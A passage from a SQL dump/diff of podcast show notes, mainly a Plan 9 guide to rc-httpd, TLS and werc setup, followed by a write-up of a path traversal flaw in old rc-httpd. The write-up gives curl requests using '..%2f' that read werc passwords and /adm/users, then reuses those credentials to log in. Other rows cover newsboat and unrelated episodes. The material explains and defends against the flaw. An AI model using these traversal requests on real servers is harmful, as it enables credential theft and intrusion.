term% auth/keyfs\nterm% auth/changeuser <ExampleUser>\nPassword: <what you put earlier>\nConfirm password:\nAssign new Inferno/POP secret? [y/n]: n\nExpiration date (YYYYMMDD or never) [never]: never\nPost id:\nUser's full name:\nDepartment #:\nUser's email address:\nSponsor's email address:\nuser <ExampleUser> installed for Plan 9\n
\n

Configure permissions

\n

/lib/ndb/auth is similar to a /etc/sudoers. This configuration for the new user allows him to execute commands as other users except for the sys and adm users (but sys and adm are more like groups but who cares).

\n

append to /lib/ndb/auth

\n
hostid=<ExampleUser>\n    uid=!sys uid=!adm uid=*\n
\n

then reboot

\n

Test if it worked with drawterm

\n

The 9front version of drawterm must be used as it supports the better crypto in 9front. Other drawterm versions probably won\'t work.

\n
$ /opt/drawterm -u <ExampleUser> -h example.com -a example.com -r ~/\n
\n

Configure rc-httpd

\n

edit /rc/bin/rc-httpd/select-handler

\n

this file is something like /etc/httpd.conf on a UNIX system.

\n
#!/bin/rc\nPATH_INFO=$location\n\n        switch($SERVER_NAME) {\n        case example.com\n               FS_ROOT=/sys/www/$SERVER_NAME\n               exec static-or-index\n\n        case *\n              error 503\n}\n
\n

To listen on port 80 and run the handler on port 80:

\n
cpu% cp /rc/bin/service/!tcp80 /rc/bin/service/tcp80\ncpu% chmod +x /rc/bin/rc-httpd/select-handler\n
\n

Reboot and test.

\n

SSL

\n

I will never give money to the CA racket. Self-signed is the way to go on systems that don\'t support acme.sh, the only ACME client I use for obtaining free SSL certs.

\n

Generate and install:

\n
cpu% ramfs -p\ncpu% cd /tmp\ncpu% auth/rsagen -t 'service=tls role=client owner=*' > key\ncpu% chmod 600 key\ncpu% cp key /sys/lib/tls/key\ncpu% auth/rsa2x509 'C=US CN=example.com' /sys/lib/tls/key | auth/pemencode CERTIFICATE > /sys/lib/tls/cert\ncpu% mkdir /cfg/$sysname\ncpu% echo 'cat /sys/lib/tls/key >> /mnt/factotum/ctl' >> /cfg/$sysname/cpustart\n
\n

Now add a listener in /rc/bin/service/tcp443:

\n
#!/bin/rc\nexec tlssrv -c /sys/lib/tls/cert -l /sys/log/https /rc/bin/service/tcp80 $*\n
\n

And make it executable:

\n
cpu% chmod +x /rc/bin/service/tcp443\n
\n

Install and configure werc

\n
cpu% cd\ncpu% mkdir /sys/www && cd www\ncpu% hget http://werc.cat-v.org/download/werc-1.5.0.tar.gz  > werc-1.5.0.tgz\ncpu% tar xzf werc-1.5.0.tgz\ncpu% mv werc-1.5.0 werc\n\n# ONLY DO THIS IF YOU *MUST* RUN THE THINGS THAT ALLOW WERC TO WRITE TO DISK\n# EG. DIRDIR, BLAGH, ETC\n# DON'T DO THIS, JUST USE DRAWTERM OVER THE NETWORK\n# HTTP CLIENTS SHOULD NEVER BE ALLOWED TO WRITE TO DISK\n# PLEASE I BEG YOU\ncpu% cd .. && for (i in `{du www | awk '{print $2}'}) chmod 777 $i\n\ncpu% cd werc/sites/\ncpu% mkdir example.com\ncpu% mv default.cat-v.org example.com\n
\n

now re-edit /rc/bin/rc-httpd/select-handler

\n
#!/bin/rc\nWERC=/sys/www/werc\nPLAN9=/\nPATH_INFO=$location\nswitch($SERVER_NAME){\ncase cirno\n        FS_ROOT=$WERC/sites/$SERVER_NAME\n        exec static-or-cgi $WERC/bin/werc.rc\ncase *\n        error 503\n}\n
\n

Test the website. Werc is fiddly. Werc is archaic. Werc is fun.

\n
\n

Path traversal vulnerabilities in old versions of rc-httpd

\n

Using release COMMUNITY VS INFRASTRUCTURE, an old release with old rc-httpd, I have done the above steps. In current releases this bug no longer exists. Use current releases.

\n

The vulnerability

\n
# get list of werc admin users\n[root@localhost]# curl http://cirno/..%2f..%2f/etc/users/admin/members\npwn\n# get that werc user's password\n[root@localhost]# http://cirno/..%2f..%2f/etc/users/pwn/password\nsupersecret\n
\n

Wait, the passwords for werc are stored in plain text? Let\'s log in

\n
[root@localhost]# firefox http://cirno/_users/login\n
\n

Now let\'s see if any of the werc users are also system users:

\n
# let's enumerate users\n[root@localhost]# curl http://cirno/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users\n-1:adm:adm:glenda,pwn\n0:none::\n1:tor:tor:\n2:glenda:glenda:\n3:pwn:pwn:\n10000:sys::glenda,pwn\n10001:map:map:\n10002:doc::\n10003:upas:upas:glenda,pwn\n10004:font::\n10005:bootes:bootes:\n
\n

Let\'s hope that no one is re-using credentials. Let\'s check just to be sure

\n
$ PASS=supersecret /opt/drawterm -u pwn -h cirno -a cirno -G\ncpu% cat /env/sysname\ncirno\ncpu%\n
\n

This is what happens when you have path traversal vulnerabilities, an authentication vulnerability in your CMS, and share login/passwords

\n

How the static-or-cgi handler works

\n

rc-httpd calls various handler scripts that decide what to do with requests. In the example configuration for werc, rc-httpd is instructed to call the static-or-cgi script.

\n

I will compile these archaic rc scripts into pseudo code for the listener.

\n

The static-or-cgi handler (the handler specified in the httpd config) is simple:

\n
#!/bin/rc\ncgiargs=$*\n\nfn error{\n    if(~ $1 404)\n        exec cgi $cgiargs\n    if not\n        $rc_httpd_dir/handlers/error $1\n}\n\nif(~ $location */)\n    exec cgi $cgiargs\nif not\n    exec serve-static\n
\n
    \n
  1. If the requested file exists, call the cgi handler and pass it arguments.
  2. \n
  3. If the requested file does not exist, call the serve-static handler.
  4. \n
\n

How the serve-static handler works

\n

The problem lies in the serve-static handler:

\n
#!/bin/rc\nfull_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d}\nfull_path=$"full_path\nif(~ $full_path */)\n    error 503\nif(test -d $full_path){\n    redirect perm $"location^'/' \\\n        'URL not quite right, and browser did not accept redirect.'\n    exit\n}\nif(! test -e $full_path){\n    error 404\n    exit\n}\nif(! test -r $full_path){\n    error 503\n    exit\n}\ndo_log 200\nswitch($full_path){\ncase *.html *.htm\n        type=text/html\ncase *.css\n        type=text/css\ncase *.txt *.md\n        type=text/plain\ncase *.jpg *.jpeg\n        type=image/jpeg\ncase *.gif\n        type=image/gif\ncase *.png\n        type=image/png\ncase *\n        type=`{file -m $full_path}\n}\nif(~ $type text/*)\n    type=$type^'; charset=utf-8'\nmax_age=3600    # 1 hour\necho 'HTTP/1.1 200 OK'^$cr\nemit_extra_headers\necho 'Content-type: '^$type^$cr\necho 'Content-length: '^`{ls -l $full_path | awk '{print $6}'}^$cr\necho 'Cache-control: max-age='^$max_age^$cr\necho $cr\nexec cat $full_path\n
\n
    \n
  1. encode the full file path into a url
  2. \n
  3. if the url points to a file outside of \'*/\', the document root, error 503
  4. \n
  5. if the url is broken, exit
  6. \n
  7. if the url points to a file that neither exists nor is readable, error 503
  8. \n
  9. if you haven\'t exited by now, serve the file
  10. \n
\n

The problem is no sanitization. The script checks for files in the current directory BUT NOT BEFORE ENCODING THE URL STRING.

\n

The urlencode command works by decoding encoded characters.

\n
cpu% echo 'http://cirno/..%2f' | urlencode -d\nhttp://cirno/../\n
\n

Does ../ exist in */ ? the answer is yes.

\n

.. is a directory contained inside of */

\n

*/../ is the current working directory.

\n

How they fixed it

\n

Adding a sanitizer. By comparing the encoded url against an actual hypothetical file path and exiting if there is a mismatch, all %2f funny business is avoided.

\n
\n

Other (optional) bad config options in werc

\n

rc-httpd aside, a bad werc config can still lead to website defacement if your non rc-httpd webserver has a path traversal vulnerability.

\n

Additionally I have modified the DAC for /sys/www to allow werc, a child process of rc-httpd to write to disk. rc-httpd runs as the none user so it\'s not typically allowed to write to disk unless explicitly permitted. I do not allow this on my 9 webserver because it\'s the worst idea in the history of all time ever.

\n

I enabled the dirdir and blagh modules as if I were the type of admin who does a chmod -R 777 /var/www/htdocs because that\'s what the wordpress installation guide told me to do so I could have a cool and easy way to modify my website from the browser.

\n

Let\'s pretend that I\'m not the admin of this system and scrape the werc config just to see if the hypothetical badmin has these modules enabled.

\n
# get config\n[root@localhost]# curl http://cirno/..%2f..%2f/sites/cirno/_werc/config\nmasterSite=cirno\nsiteTitle='Werc Test Suite'\nconf_enable_wiki\nwiki_editor_groups admin\n
\n

Hmmm, looks like these modules are enabled so we can assume that httpd is allowed to write to disk. Let\'s modify cirno/index.md to warn the admin. As a funny joke. Totally not a crime under the Computer Fraud and Abuse Act. Totally not an inappropriate way to warn admins about a vulnerability.

\n
[root@localhost]# curl -s cirno | pandoc --from html --to plain\nquotes | docs | repo | golang | sam | man | acme | Glenda | 9times |\nharmful | 9P | cat-v.org\n\nRelated sites: | site updates | site map |\n\nWerc Test Suite\n\n-   › apps/\n-   › titles/\n\nSECURITY ADVISORY:\n\nlol this guy still hasn't figured out the ..%2f trick\n\nPowered by werc\n
\n

Modifying werc to support password hashing

\n

Adding password hashes isn\'t too difficult. Being constrained by time, I have not done this quite yet. Reading the source code, all it takes is modifying 2 werc scripts: bin/werclib.rc and bin/aux/addwuser.rc

\n
% echo 'supersecret' | sha1sum -2 512\n
\n
\n

Private namespaces to the rescue

\n

Luckily enough, the webserver runs as the none user with it\'s own namespace.

\n

Comparing the hostowner\'s namespace and none user\'s namespace

\n

I grab the namespace from the system console (ie not from drawterm) and from the listen command, then run a diff (unix style) to show the differences.

\n
cpu% ns | sort > cpu.ns\ncpu% ps -a | grep -e 'listen.*80' | grep -v grep\nnone            355    0:00   0:00      132K Open     listen [/net/tcp/2 tcp!*!80]\ncpu% ns 355 | sort > listen.ns\ncpu% diff -u listen.ns cpu.ns\n--- listen.ns\n+++ cpu.ns\n@@ -6,17 +6,29 @@\n bind  /amd64/bin /bin\n bind  /mnt /mnt\n bind  /mnt/exportfs /mnt/exportfs\n+bind  /mnt/temp/factotum /mnt/factotum\n bind  /n /n\n bind  /net /net\n bind  /root /root\n+bind -a '#$' /dev\n bind -a '#I' /net\n+bind -a '#P' /dev\n+bind -a '#S' /dev\n bind -a '#l' /net\n+bind -a '#r' /dev\n+bind -a '#t' /dev\n+bind -a '#u' /dev\n+bind -a '#u' /dev\n bind -a '#¤' /dev\n bind -a '#¶' /dev\n+bind -a '#σ/usb' /dev\n+bind -a '#σ/usbnet' /net\n bind -a /rc/bin /bin\n bind -a /root /\n+bind -b '#k' /dev\n bind -c '#e' /env\n bind -c '#s' /srv\n+bind -c /usr/pwn/tmp /tmp\n cd /usr/pwn\n mount -C '#s/boot' /n/other other\n mount -a '#s/boot' /\n@@ -26,4 +38,4 @@\n mount -a '#s/slashmnt' /mnt\n mount -a '#s/slashn' /n\n mount -aC '#s/boot' /root\n-mount -b '#s/factotum' /mnt\n+mount -b '#s/cons' /dev\n
\n

The major difference is that the hostowner (equivalent to root user) has a lot more things bound to his namespace:

\n\n

The listen process in question is fairly well isolated from the system. Minimal system damage can be caused by pwning a process owned by none.

\n
\n

Closing

\n

An argument could be maid that the rc-httpd vulnerability was \"not a bug\" because \"namespaces are supposed to segregate the system\".

\n

I disagree on this point. Namespaces are good and all but security is a multi-layer thing. Relying on a single security feature to save your system means relying on a single point of failure. Chroot escapes, namespace escapes, container escapes, and VM escapes are all things we need to be thinking about when writing software that touches the internet. Although unlikely, getting pwnd in spite of these security methods is still possible; all user input is dangerous and all user input that becomes remote code execution always results in privilege escalation no matter how secure you think your operating system is. Each additional layer of security makes it harder for attackers to get into the system.

\n

For example, when I write PHP applications, I consider things in this order:

\n
    \n
  1. don\'t pass unnecessary resources into the document root via symlinks, bind mounts, etc.
  2. \n
  3. never ever use system() in a context where user input can ever be passed to the function in order to avoid shell escapes
  4. \n
  5. sanitize all user input depending on context. Ex: if the PHP program is directly referencing files, make a whitelist and compare requests to this whitelist. If the PHP process is writing to a database, use prepared statements.
  6. \n
  7. fire up a kali linux vm and beat the test server half to death
  8. \n
  9. iterate upon my ignorance
  10. \n
  11. doubly verify DAC just to be sure
  12. \n
  13. re-check daemon configs to make sure I\'m not doing anything stupid
  14. \n
  15. FINALLY: rely on SELinux or OpenBSD chroots (depending on prod env) to save me if all else failed
  16. \n
\n

And of course the other things like firewalls (with whitelists for ports and blacklists for entire IP address blocks), key based ssh authentication, sshd configurations that don\'t make it possible to enumerate users, rate limiters, etc.

\n

Each layer of security is like a filter. If you have enough layers of filters it would take an unrealistic amount of force to push water through this filter. Although no system is perfectly safe from three letter agencies, a system with multiple layers of security is typically safe from drive-by attacks.

\n

Final exercise: intentionally write a php script that does path traversal. Run this on a system with SELinux. Try to coax /etc/passwd out of the server. Now try php-fpm instead of mod_php or vice-versa. You\'ll be surprised when even MAC doesn\'t protect your system.

\n

Even now, after spending almost a month and a half worth of after work hacker hours almost exclusively on 9, I enjoy it more than when I began and even more than when using it in semi-regular spurts in years past. The purpose of research operating systems is to perform research, be it about the design of the system otherwise. Where would we be without private namespaces? How can I use this idea in the real world? What would the world look like if we had real distributed computing instead of web browsers (which are the new dumb terminal)? Is there a use case for this in the real world? What can we learn from single layer security models? What can we do to improve the system?

\n

Plan 9 is perfect for this type of research. I\'m considering writing an httpd in C and a werc-like (minus the parts I don\'t like) in C and modifying the namespace for the listener so that I can run a webserver on 9 without pulling in /bin in order to reduce the possibility of a shell escape.

\n

I think that in order to improve ourselves, we must be critical of ourselves. We must be critical of the things we enjoy in order to improve them and learn something new in the process. For software especially, there is no such thing as perfection, only least bad. And my final thought:

\n
\n

Criticism: This program/OS/whatever sucks

\n
\n
\n

Response: I know, help me fix it.

\n
\n',406,0,1,'CC-BY-SA','Plan 9, private namespaces, security, research operating systems',0,0,1), (3695,'2022-09-30','How I watch youtube with newsboat',663,'Using youtube\'s channel RSS feeds to watch youtube from the command line','

How I watch youtube with newsboat

\n

I find that the youtube web ui is designed to keep users on the site by feeding them an unending stream of information. Bright colors, distracting thumbnails, peanut galleries, etc. I prefer to consume my videos in the same way I consume everything else: via RSS.

\n

RSS is my favorite way of aggregating things that other people have made because it allows me, the user, to interact with their things

\n

The only dependencies not on a standard UNIX system are newsboat and a video player. I also use yt-dlp to download videos for later viewing. I like mpv but you can substitute your own.

\n
$ sudo $pkgmrg install newsboat mpv yt-dlp
\n

Getting RSS feeds from youtube

\n

Youtube (currently) provides RSS feeds for channels.

\n

Finding Youtube channel ID

\n

Sometimes channels have vanity URLs that can make it difficult to find the channel ID. Other times, the URL contains the channel ID. All youtube channel IDs start with the string UC so we can easily grep for them.

\n
$ curl https://www.youtube.com/c/RMCRetro | grep --color "href=\\"https://www.youtube.com/channel/UC\\""\n[ lots of nonsense ]\nhref="https://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w"\n[ lots of nonsense ]
\n

In order to turn this channel ID into something useful, we create the following URL:

\n
https://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w
\n

Google takeout can also be used to export youtube subscriptions.

\n

The export format is a CSV that contains the channel IDs for all of our subscriptions.

\n
Channel Id,Channel Url,Channel Title\nUCLEoyoOKZK0idGqSc6Pi23w,http://www.youtube.com/channel/UCLEoyoOKZK0idGqSc6Pi23w,RMC - The Cave
\n

Newsboat url list

\n

Newsboat reads it’s list of URLs from ~/.config/newsboat/urls. Every url we add to this list will be automaticlly fetched. You can make separate URL lists for your list of videos and list of standard text based RSS feeds

\n

If you have an exported CSV, you can easily modify it so that newsboat will accept it as a list of URLs by deleting row 1, column 1+comma, and replacing the comma between the URL and channel name with a tab character. Doing a sed \'s/channel\\//feeds\\/videos.xml?channel_id=/g\' on the file is an easy way to replace the website URL with the feed url. Newsboat only reads the first field of every row so the channel name can be kept for easier subscription management.

\n
http://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w     RMC - The Cave
\n

Newsboat config

\n

In order to play videos, we need to add some macros to the newsboat config file at ~/.config/newsboat/config

\n

Mine looks like this.

\n
# load URLS on launch\nauto-reload  yes\n\n# vim binds\nbind-key j down\nbind-key k up\nbind-key j next articlelist\nbind-key k prev articlelist\nbind-key J next-feed articlelist\nbind-key K prev-feed articlelist\nbind-key G end\nbind-key g home\nbind-key d pagedown\nbind-key u pageup\nbind-key l open\nbind-key h quit\nbind-key a toggle-article-read\nbind-key n next-unread\nbind-key N prev-unread\nbind-key D pb-download\nbind-key U bashow-urls\nbind-key x pb-delete\n\n# macro setup\nbrowser linkhandler\nmacro , open-in-browser\n\n# launch video player\nmacro v set browser "setsid -f mpv" ; open-in-browser ; set browser linkhandler\n\n# download video\nmacro d set browser "yt-dlp"; open-in-browser ; set browser linkhandler\n\n# download audio only\nmacro a set browser "yt-dlp --embed-metadata -xic -f bestaudio/best" ; open-in-browser ; set browser linkhandler
\n

Video demo

\n

This is a demo of using newsboat with videos. In order to execute the macros, you type , then v or whatever other letter you set the macro to.

\n

video in webm format your web browser or operating system does not support free video codecs :(

\n

A url list to get you started

\n
https://www.youtube.com/feeds/videos.xml?channel_id=UC3ts8coMP645hZw9JSD3pqQ        Andreas Kling\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC9-y-6csu5WGm29I7JiwpnA        Computerphile\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC15BJjhPr4d5gTClhmC4HRw        Elliot Coll\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCxQKHvKbmSzGMvUrVtJYnUA        Learn Linux TV\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCm9K6rby98W8JigLoZOh6FQ        LockPickingLawyer\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCl2mFZoRqjw_ELax4Yisf6w        Louis Rossmann\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC2eYFnH61tmytImy1mTYvhA        Luke Smith\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC7YOGHUfC1Tb6E4pudI9STA        Mental Outlaw\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCjFaPUcJU1vwk193mnW_w1w        Modern Vintage Gamer\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCLEoyoOKZK0idGqSc6Pi23w        RMC - The Cave\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC4rqhyiTs7XyuODcECvuiiQ        Scott The Woz\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC5I2hjZYiW9gZPVkvzM8_Cw        Techmoan\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCy0tKL1T7wFoYcxCe0xjN6Q        Technology Connections\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC8uT9cgJorJPWu7ITLGo9Ww        The 8-Bit Guy\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UC5UAwBUum7CPN5buc-_N1Fw        The Linux Experiment\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCFMx-JitepTttWc-ABHhu8A        This Week in Retro\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCsnGwSIHyoYN0kiINAGUKxg        Wolfgang's Channel\nhttps://www.youtube.com/feeds/videos.xml?channel_id=UCJ8V9aiz50m6NVn0ix5v8RQ        decino                
\n',406,0,1,'CC-BY-SA','newsboat, RSS, youtube',0,0,1), -(3956,'2023-10-02','HPR Community News for September 2023',0,'HPR Volunteers talk about shows released and comments posted in September 2023','',159,47,1,'CC-BY-SA','Community News',0,0,1), +(3956,'2023-10-02','HPR Community News for September 2023',0,'HPR Volunteers talk about shows released and comments posted in September 2023','\n\n

New hosts

\n

\nWelcome to our new host:
\n\n Noodlez.\n

\n\n

Last Month\'s Shows

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
IdDayDateTitleHost
3935Fri2023-09-01Server build retrospectiveDaniel Persson
3936Mon2023-09-04HPR Community News for August 2023HPR Volunteers
3937Tue2023-09-05Adventures in Pi-HoleNoodlez
3938Wed2023-09-06An open directory of web audio streamdnt
3939Thu2023-09-07How I got into tech and hackingTrixter
3940Fri2023-09-08Equipment MaintenanceAhuka
3941Mon2023-09-11Interview with Yosef Kerzneroperat0r
3942Tue2023-09-12RE: How to make friends.Some Guy On The Internet
3943Wed2023-09-13Why my Dell does it better on Linux.knightwise
3944Thu2023-09-14Race for the Galaxytuturto
3945Fri2023-09-15My chrome pluginsDaniel Persson
3946Mon2023-09-18Planning for a planner, part 02.Some Guy On The Internet
3947Tue2023-09-19Archiving Floppy DisksSteve Saner
3949Thu2023-09-21How I use virtualisation to tame my Social Media addiction.knightwise
3950Fri2023-09-22Sid Meiers\' Alpha CentauriAhuka
3951Mon2023-09-25Cell Phone Screen Protectorsoperat0r
3955Fri2023-09-29airgradient measurement stationDaniel Persson
\n\n

Comments this month

\n\n\nThere were no comments this month.\n\n

Mailing List discussions

\n

\nPolicy decisions surrounding HPR are taken by the community as a whole. This\ndiscussion takes place on the Mail List which is open to all HPR listeners and\ncontributors. The discussions are open and available on the HPR server under\nMailman.\n

\n

The threaded discussions this month can be found here:

\nhttps://lists.hackerpublicradio.com/pipermail/hpr/2023-September/thread.html\n\n\n

Events Calendar

\n

With the kind permission of LWN.net we are linking to\nThe LWN.net Community Calendar.

\n

Quoting the site:

\n
This is the LWN.net community event calendar, where we track\nevents of interest to people using and developing Linux and free software.\nClicking on individual events will take you to the appropriate web\npage.
\n\n

Any other business

\n\n\n\n',159,47,1,'CC-BY-SA','Community News',0,0,1), (3691,'2022-09-26','Starship.rs the best prompt I don\'t use',1529,'Bash prompts','

Here\'s the snippets I use in my .bashrc file.

\n\n
RED='\033[0;31m'\nPLAIN='\033[0m' # No Color\nWHITE='\e[97m'\nGREEN='\e[0;32m'\nPURPLE='\e[35;35m'\nCYAN='\e[36;36m'\n\nJAVA_VERSION=`java --version | head -1 | cut -f2 -d' '`\n\nIP=$(hostname -I | awk '{print $1;}' )\nsource /usr/doc/git-2.35.1/contrib/completion/git-prompt.sh\nPS1='\! [\['$GREEN'\]$(hostname -s) $IP\['$PLAIN'\]] [\['$CYAN'\]$(pwd -P)\['$PLAIN'\]] $(__git_ps1 "[\['$PURPLE'\] %s\['$PLAIN'\]]")[☕ '$JAVA_VERSION']\n\['$GREEN'\]$\['$PLAIN'\] '
\n',78,0,0,'CC-BY-SA','bash,ps1,terminal,linux',0,0,1), (3698,'2022-10-05','Spectrogram',949,'Edit audio as a spectrogram','

Here\'s a view of my voice. The bright spots at the bottom of the image are my voice, and the bright burst at the top is a click caused by saliva.

\n\n

Here\'s me inhaling. Notice how sparse this is compared to my voice.

\n\n

One thing I fail to mention in the episode is that there are network monitors that render network activity as a spectrogram, too. If you don\'t have a Wi-Spy, it\'s worth looking at.

\n',78,0,0,'CC-BY-SA','audio',0,0,1), (3726,'2022-11-14','Breaches ever reaching',251,'A short episode about the reaching effects of breaches and forgotten accounts','

A short episode about the reaching effects of breaches and accounts you may have forgotten about.

\n\n',405,74,1,'CC-BY-SA','cybersecurity,security,EvilSteve,breach,data reduction,privacy',0,0,1), @@ -20208,13 +20208,13 @@ INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hosti (3896,'2023-07-10','The Brochs of Glenelg',782,'A verbal tour in situ of one of the two brochs of Glenelg','In this episode I visit one of the best preserved brochs on the Scottish mainland called Dun Telve. It is one of two that are a few miles outside the village of Glenelg which is rare itself in that its name is a palindrome.\n\n

\"The

\n\n

\"The

\n',268,101,0,'CC-BY-SA','history,scotland,prehistoric',0,0,1), (3895,'2023-07-07','What\'s in my backpack',514,'Stache walks through the contents of his work backpack','

I have many things in my work backpack, to include a Raspberry Pico,\nmultiple USB drives, USB cables, two laptops, my glasses and a\nsunglasses case attached to the outside.

\n

It is a 5.11 RUSH MOAB 10 Sling Pack 18L, not because I want to be\n\"tacticool\" but because I like their products, and that they support\nveterans like myself.

\n',408,23,0,'CC-BY-SA','backpack contents, toolkit',0,0,1), (3897,'2023-07-11','HPR AudioBook Club 22 - Murder at Avedon Hill',6119,'In this episode the HPR Audiobook Club discusses \"Murder at Avedon Hill\" by P.G. Holyfield','In\nthis episode the HPR Audiobook Club discusses the audiobook Murder\nat Avedon Hill by P.G. Holyfield\n
\n

Non-Spoiler Thoughts

\n
\n
    \n
  • Great reading, great audio quality, fun setting and setup. It had\nthe feel of a role playing adventure at the beginning, but was well\nfleshed out by the middle. It would have been slightly better if all of\nthe guest voices had had a pronunciation guide for the names.
  • \n
\n

Beverage Reviews

\n
\n
    \n
  • Thaj: A delicious regular chocolate malt from the\nlocal ice cream shop \"The Comfy Cow\"
  • \n
  • x1101: Barton\'s 1795
  • \n
  • Pokey Leinenkugel\'s: I have a fall variety pack,\nbut this is not the fall. I\'m not enjoying this beer as much as I\nexpected. It\'s good, and I can taste the high quality of the\ningredients, but I think it\'s just the wrong season for this.
  • \n
\n

Things We Talked About

\n
\n\n

Our Next Audiobook

\n
\n

A\nPrincess of Mars by Edgar Rice Burroughs

\n

The Next Audiobook Club\nRecording

\n
\n

Right now we are working through a backlog of older episodes that\nhave already been recorded. Once that ends we fully anticipate recording\nnew episodes with listener participation.

\n

Feedback

\n
\n

Thank you very much for listening to this episode of the HPR\nAudioBookClub. We had a great time recording this show, and we hope you\nenjoyed it as well. We also hope you\'ll consider joining us next time we\nrecord a new episode. Please leave a few words in the episode\'s comment\nsection.

\n

As always; remember to visit the HPR contribution page HPR could\nreally use your help right now.

\n

Sincerely, The HPR Audiobook Club

\n

P.S. Some people really like finding mistakes. For their enjoyment,\nwe always include a few.

\n

Our Audio

\n
\n

This episode was processed using Audacity. We\'ve been making\nsmall adjustments to our audio mix each month in order to get the best\npossible sound. Its been especially challenging getting all of our\nvoices relatively level, because everyone has their own unique setup.\nMumble is great for bringing us all together, and for recording, but\nit\'s not good at making everyone\'s voice the same volume. We\'re pretty\nhappy with the way this month\'s show turned out, so we\'d like to share\nour editing process and settings with you and our future selves (who, of\ncourse, will have forgotten all this by then).

\n

We use the \"Truncate Silence\" effect with it\'s default settings to\nminimize the silence between people speaking. When used with it\'s\ndefault (or at least reasonable) settings, Truncate Silence is extremely\neffective and satisfying. It makes everyone sound smarter, it makes the\nfile shorter without destroying actual content, and it makes a\nconversations sound as easy and fluid during playback as it was while it\nwas recorded. It can be even more effective if you can train yourself to\nremain silent instead of saying \"uuuuummmm.\" Just remember to ONLY pass\nthe file through Truncate Silence ONCE. If you pass it through a second\ntime, or if you set it too aggressively your audio may sound sped up and\nchoppy.

\n

Next we use the \"Compressor\" effect with the following settings:

\n
Threshold: -30db\n\nNoise Floor: -50db\n\nRatio: 3:1\n\nAttack Time: 0.2sec\n\nDecay Time: 1.0 sec`
\n

\"Make-up Gain for 0db after compressing\" and \"compress based on\npeaks\" were both left un-checked.

\n

After compressing the audio we cut any pre-show and post-show chatter\nfrom the file and save them in a separate file for possible use as\nouttakes after the closing music.

\n

We adjust the Gain so that the VU meter in Audacity hovers around\n-12db while people are speaking, and we try to keep the peaks under\n-6db, and we adjust the Gain on each of the new tracks so that all\nvolumes are similar, and more importantly comfortable. Once this is done\nwe can \"Mix and Render\" all of our tracks into a single track for export\nto the .FLAC file which is uploaded to the HPR server.

\n

At this point we listen back to the whole file and we work on the\nshownotes. This is when we can cut out anything that needs to be cut,\nand we can also make sure that we put any links in the shownotes that\nwere talked about during the recording of the show. We finish the\nshownotes before exporting the .aup file to .FLAC so that we can paste a\ncopy of the shownotes into the audio file\'s metadata.

\n

At this point we add new, empty audio tracks into which we paste the\nintro, outro and possibly outtakes, and we rename each track\naccordingly.

\n

Remember to save often when using Audacity. We like to save after\neach of these steps. Audacity has a reputation for being \"crashy\" but if\nyou remember save after every major transform, you will wonder how it\never got that reputation.

\n',157,53,1,'CC-BY-SA','Audiobook club, audiobook, fantasy, fiction',0,0,1), -(3907,'2023-07-25','My introduction show',1153,'About me and computers','

The show notes

\n\n',421,0,0,'CC-BY-SA','introduction,solocast',0,0,1), -(3899,'2023-07-13','Repair corrupt video files for free with untruc',320,'This is how I fixed corrupt video files from my dash cam after an accident','

My original blog post on this topic: https://pquirk.com/posts/corruptvideo/

\n
    \n
  • Untruc at Github: https://github.com/anthwlock/untrunc
  • \n
  • Windows version: https://github.com/anthwlock/untrunc/releases
  • \n
  • Arch linux version: https://aur.archlinux.org/packages/untrunc-git
  • \n
\n

Make your donations to:
\nhttps://www.paypal.com/paypalme/anthwlock
\nhttps://vcg.isti.cnr.it/~ponchio/untrunc.php

\n',383,0,0,'CC-BY-NC-SA','video,corrupt,fix,file,linux',0,0,1), +(3907,'2023-07-25','My introduction show',1153,'About me and computers','

The show notes

\n\n',421,0,0,'CC-BY-SA','introduction,solocast',0,0,1); +INSERT INTO `eps` (`id`, `date`, `title`, `duration`, `summary`, `notes`, `hostid`, `series`, `explicit`, `license`, `tags`, `version`, `downloads`, `valid`) VALUES (3899,'2023-07-13','Repair corrupt video files for free with untruc',320,'This is how I fixed corrupt video files from my dash cam after an accident','

My original blog post on this topic: https://pquirk.com/posts/corruptvideo/

\n
    \n
  • Untruc at Github: https://github.com/anthwlock/untrunc
  • \n
  • Windows version: https://github.com/anthwlock/untrunc/releases
  • \n
  • Arch linux version: https://aur.archlinux.org/packages/untrunc-git
  • \n
\n

Make your donations to:
\nhttps://www.paypal.com/paypalme/anthwlock
\nhttps://vcg.isti.cnr.it/~ponchio/untrunc.php

\n',383,0,0,'CC-BY-NC-SA','video,corrupt,fix,file,linux',0,0,1), (3921,'2023-08-14','HPR AudioBook Club 23 - John Carter of Mars (Books 1-3)',6516,'In this episode the HPR Audiobook Club discusses the first three books of John Carter of Mars','In\nthis episode the HPR Audiobook Club discusses the audiobooks A\nPrincess of Mars, The\nGods of Mars, and The\nWarlord of Mars by Edgar Rice Burroughs\n
\n

Non-Spoiler Thoughts

\n
\n
    \n
